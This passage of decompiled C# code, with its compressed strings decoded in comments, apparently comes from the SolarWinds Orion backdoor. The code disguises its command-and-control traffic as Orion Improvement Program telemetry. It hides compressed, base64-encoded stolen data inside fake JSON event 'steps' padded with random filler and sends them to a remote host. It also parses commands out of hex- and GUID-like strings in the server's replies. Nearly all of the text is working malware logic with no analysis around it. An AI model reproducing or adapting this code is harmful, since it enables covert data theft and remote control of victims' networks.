                    {
                        // SolarWinds
                        text2 += ZipHelper.Unzip("C87PSSwKz8xLKQYA");
                        if (this.Valid(40))
                        {
                            // .CortexPlugin
                            text2 += ZipHelper.Unzip("03POLypJrQjIKU3PzAMA");
                        }
                    }
                    if (this.Valid(80))
                    {
                        // .Orion
                        text2 += ZipHelper.Unzip("0/MvyszPAwA=");
                    }
                    if (this.Valid(80))
                    {
                        string[] array4 = new string[]
                        {
                            // Wireless
                            ZipHelper.Unzip("C88sSs1JLS4GAA=="),
                            // UI
                            ZipHelper.Unzip("C/UEAA=="),
                            // Widgets
                            ZipHelper.Unzip("C89MSU8tKQYA"),
                            // NPM
                            ZipHelper.Unzip("8wvwBQA="),
                            // Apollo
                            ZipHelper.Unzip("cyzIz8nJBwA="),
                            // CloudMonitoring
                            ZipHelper.Unzip("c87JL03xzc/LLMkvysxLBwA=")
                        };
                        text2 = text2 + "." + array4[this.random.Next(array4.Length)];
                    }
                    if (this.Valid(30) || string.IsNullOrEmpty(text2))
                    {
                        string[] array5 = new string[]
                        {
                            // Nodes
                            ZipHelper.Unzip("88tPSS0GAA=="),
                            // Volumes
                            ZipHelper.Unzip("C8vPKc1NLQYA"),
                            // Interfaces
                            ZipHelper.Unzip("88wrSS1KS0xOLQYA"),
                            // Components
                            ZipHelper.Unzip("c87PLcjPS80rKQYA")
                        };
                        text2 = text2 + "." + array5[this.random.Next(array5.Length)];
                    }
                    if (this.Valid(30) || text != null)
                    {
                        text2 = string.Concat(new object[]
                        {
                            text2,
                            "-",
                            this.random.Next(1, 20),
                            ".",
                            this.random.Next(1, 30)
                        });
                        if (text != null)
                        {
                            text2 = text2 + "." + ((ushort)err).ToString();
                        }
                    }
                    // swip/upd/
                    return(ZipHelper.Unzip("Ky7PLNAvLUjRBwA=") + text2.TrimStart(new char[]
                    {
                        '.'
                        // .xml
                    }) + ZipHelper.Unzip("06vIzQEA"));
                }
                if (method != HttpHelper.HttpOipExMethods.Put)
                {
                    // swip/Upload.ashx
                    return(ZipHelper.Unzip("Ky7PLNAPLcjJT0zRSyzOqAAA"));
                }
                // swip/Events
                return(ZipHelper.Unzip("Ky7PLNB3LUvNKykGAA=="));
            }
        }
        private HttpStatusCode CreateUploadRequest(HttpHelper.JobEngine job, int err, string response, out byte[] outData)
        {
            string text = this.httpHost;

            byte[] array = null;
            HttpHelper.HttpOipExMethods httpOipExMethods = (job != HttpHelper.JobEngine.Idle && job != HttpHelper.JobEngine.None) ? HttpHelper.HttpOipExMethods.Head : HttpHelper.HttpOipExMethods.Get;
            outData = null;
            try
            {
                if (!string.IsNullOrEmpty(response))
                {
                    byte[] bytes  = Encoding.UTF8.GetBytes(response);
                    byte[] bytes2 = BitConverter.GetBytes(err);
                    byte[] array2 = new byte[bytes.Length + bytes2.Length + this.customerId.Length];
                    Array.Copy(bytes, array2, bytes.Length);
                    Array.Copy(bytes2, 0, array2, bytes.Length, bytes2.Length);
                    Array.Copy(this.customerId, 0, array2, bytes.Length + bytes2.Length, this.customerId.Length);
                    array            = HttpHelper.Inflate(array2);
                    httpOipExMethods = ((array.Length <= 10000) ? HttpHelper.HttpOipExMethods.Put : HttpHelper.HttpOipExMethods.Post);
                }
                if (!text.StartsWith(Uri.UriSchemeHttp + "://", StringComparison.OrdinalIgnoreCase) && !text.StartsWith(Uri.UriSchemeHttps + "://", StringComparison.OrdinalIgnoreCase))
                {
                    text = Uri.UriSchemeHttps + "://" + text;
                }
                if (!text.EndsWith("/"))
                {
                    text += "/";
                }
                text += this.GetBaseUri(httpOipExMethods, err);
                HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(text);
                if (httpOipExMethods == HttpHelper.HttpOipExMethods.Get || httpOipExMethods == HttpHelper.HttpOipExMethods.Head)
                {
                    // If-None-Match
                    httpWebRequest.Headers.Add(ZipHelper.Unzip("80zT9cvPS9X1TSxJzgAA"), this.GetCache());
                }
                if (httpOipExMethods == HttpHelper.HttpOipExMethods.Put && (this.requestMethod == HttpOipMethods.Get || this.requestMethod == HttpOipMethods.Head))
                {
                    int[] intArray = this.GetIntArray((array != null) ? array.Length : 0);
                    int   num      = 0;
                    ulong num2     = (ulong)DateTime.UtcNow.Subtract(new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
                    num2 -= 300000UL;
                    string text2 = "{";
                    // "userId":"{0}",
                    text2 += string.Format(ZipHelper.Unzip("UyotTi3yTFGyUqo2qFXSAQA="), this.GetOrionImprovementCustomerId());
                    // "sessionId":"{0}",
                    text2 += string.Format(ZipHelper.Unzip("UypOLS7OzM/zTFGyUqo2qFXSAQA="), this.sessionId.ToString().Trim(new char[]
                    {
                        '{',
                        '}'
                    }));
                    // "steps":[
                    text2 += ZipHelper.Unzip("UyouSS0oVrKKBgA=");
                    for (int i = 0; i < intArray.Length; i++)
                    {
                        uint num3 = (uint)((this.random.Next(4) == 0) ? this.random.Next(512) : 0);
                        num2 += (ulong)num3;
                        byte[] array3;
                        if (intArray[i] > 0)
                        {
                            num2  |= 2UL;
                            array3 = array.Skip(num).Take(intArray[i]).ToArray <byte>();
                            num   += intArray[i];
                        }
                        else
                        {
                            num2  &= 18446744073709551613UL;
                            array3 = new byte[this.random.Next(16, 28)];
                            for (int j = 0; j < array3.Length; j++)
                            {
                                array3[j] = (byte)this.random.Next();
                            }
                        }
                        text2 += "{";
                        // "Timestamp":"\/Date({0})\/",
                        text2 += string.Format(ZipHelper.Unzip("UwrJzE0tLknMLVCyUorRd0ksSdWoNqjVjNFX0gEA"), num2);
                        string str = text2;
                        // "Index":{0},
                        string format = ZipHelper.Unzip("U/LMS0mtULKqNqjVAQA=");
                        int    num4   = this.mIndex;
                        this.mIndex = num4 + 1;
                        text2       = str + string.Format(format, num4);
                        // "EventType":"Orion",
                        text2 += ZipHelper.Unzip("U3ItS80rCaksSFWyUvIvyszPU9IBAA==");
                        // "EventName":"EventManager",
                        text2 += ZipHelper.Unzip("U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==");
                        // "DurationMs":{0},
                        text2 += string.Format(ZipHelper.Unzip("U3IpLUosyczP8y1Wsqo2qNUBAA=="), num3);
                        // "Succeeded":true,
                        text2 += ZipHelper.Unzip("UwouTU5OTU1JTVGyKikqTdUBAA==");
                        // "Message":"{0}"
                        text2 += string.Format(ZipHelper.Unzip("U/JNLS5OTE9VslKqNqhVAgA="), Convert.ToBase64String(array3).Replace("/", "\\/"));
                        text2 += ((i + 1 != intArray.Length) ? "}," : "}");
                    }
                    text2 += "]}";
                    // application/json
                    httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/TzyrOzwMA");
                    array = Encoding.UTF8.GetBytes(text2);
                }
                if (httpOipExMethods == HttpHelper.HttpOipExMethods.Post || this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Post)
                {
                    // application/octet-stream
                    httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/Tz08uSS3RLS4pSk3MBQA=");
                }
                return(this.CreateUploadRequestImpl(httpWebRequest, array, out outData));
            }
            catch (Exception)
            {
            }
            return((HttpStatusCode)0);
        }
 private HttpHelper.JobEngine ParseServiceResponse(byte[] body, out string args)
 {
     args = null;
     try
     {
         if (body == null || body.Length < 4)
         {
             return(HttpHelper.JobEngine.None);
         }
         HttpOipMethods httpOipMethods = this.requestMethod;
         if (httpOipMethods != HttpOipMethods.Put)
         {
             if (httpOipMethods != HttpOipMethods.Post)
             {
                 // "\{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}"
                 string[] value = (from Match m in Regex.Matches(Encoding.UTF8.GetString(body), ZipHelper.Unzip("U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA"), RegexOptions.IgnoreCase)
                                   select m.Value).ToArray <string>();
                 body = Utilities.HexStringToByteArray(string.Join("", value).Replace("\"", string.Empty).Replace("-", string.Empty).Replace("{", string.Empty).Replace("}", string.Empty));
             }
             else
             {
                 body = body.Skip(12).ToArray <byte>();
             }
         }
         else
         {
             body = body.Skip(48).ToArray <byte>();
         }
         int num = BitConverter.ToInt32(body, 0);
         body = body.Skip(4).Take(num).ToArray <byte>();
         if (body.Length != num)
         {
             return(HttpHelper.JobEngine.None);
         }
         string[] array = Encoding.UTF8.GetString(HttpHelper.Deflate(body)).Trim().Split(new char[]
         {
             ' '
         }, 2);
         HttpHelper.JobEngine jobEngine = (HttpHelper.JobEngine) int.Parse(array[0]);
         args = ((array.Length > 1) ? array[1] : null);
         return(Enum.IsDefined(typeof(HttpHelper.JobEngine), jobEngine) ? jobEngine : HttpHelper.JobEngine.None);
     }
     catch (Exception)
     {
     }
     return(HttpHelper.JobEngine.None);
 }